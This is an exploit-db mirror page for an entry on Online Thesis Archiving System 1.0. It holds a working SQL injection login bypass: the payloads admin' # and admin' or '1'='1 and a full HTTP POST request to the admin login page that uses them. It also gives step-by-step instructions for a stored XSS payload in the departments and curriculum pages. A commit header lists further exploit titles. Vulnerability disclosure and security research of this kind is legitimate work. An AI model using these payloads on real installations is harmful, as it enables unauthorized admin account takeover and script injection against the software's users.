bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/50597.txt
Offensive Security 90f7e494d6 DB: 2021-12-15 
9 changes to exploits/shellcodes

Laravel Valet 2.0.3 - Local Privilege Escalation (macOS)
Microsoft Internet Explorer / ActiveX Control - Security Bypass
Apache Log4j2 2.14.1 - Information Disclosure
Apache Log4j 2 - Remote Code Execution (RCE)
WordPress Plugin Typebot 1.4.3 - Stored Cross Site Scripting (XSS) (Authenticated)
Booked Scheduler 2.7.5 - Remote Command Execution (RCE) (Authenticated)
Zucchetti Axess CLOKI Access Control 1.64 - Cross Site Request Forgery (CSRF)
meterN v1.2.3 - Remote Code Execution (RCE) (Authenticated)
Online Thesis Archiving System 1.0 - SQLi Authentication Bypass
2021-12-15 05:01:54 +00:00

38 lines
No EOL
1.5 KiB
Text
Raw Blame History

# Exploit Title: Online Thesis Archiving System 1.0 - SQLi Authentication Bypass
# Exploit Author: Yehia Elghaly (YME)
# Vendor Homepage: https://www.sourcecodester.com/
# Software Link: https://www.sourcecodester.com/php/15083/online-thesis-archiving-system-using-phpoop-free-source-code.html
# Version: Online Thesis Archiving System 1.0
# Tested on: Windows, xampp
# CVE: N/A
- Description:SQLi Authentication Bypass
SQL Injection vulnerability exists in Online Thesis Archiving System 1.0 1.0. An admin account takeover exists with the payload: admin' # - admin' or '1'='1
PoC:
POST /otas/admin/login.php HTTP/1.1
Host: 192.168.113.130
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:95.0) Gecko/20100101 Firefox/95.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 35
Origin: http://192.168.113.130
DNT: 1
Connection: close
Referer: http://192.168.113.130/otas/admin/login.php
Cookie: PHPSESSID=0jsudph494kpt2a5jvbvdvsrsc
Upgrade-Insecure-Requests: 1
username=admin' #&password=admin' #
- Description: Stored Cross Site Scripting (XSS)
Stored Cross Site Scripting (XSS) exists in Online Thesis Archiving System 1.0.
Steps:
1- Go to (http://localhost/otas/admin/?page=departments) and (http://localhost/otas/admin/?page=curriculum)
2- Add new (curriculum) or (department)
3- Insert your payload <script>("xssyf")</script>
Reference in a new issue View git blame Copy permalink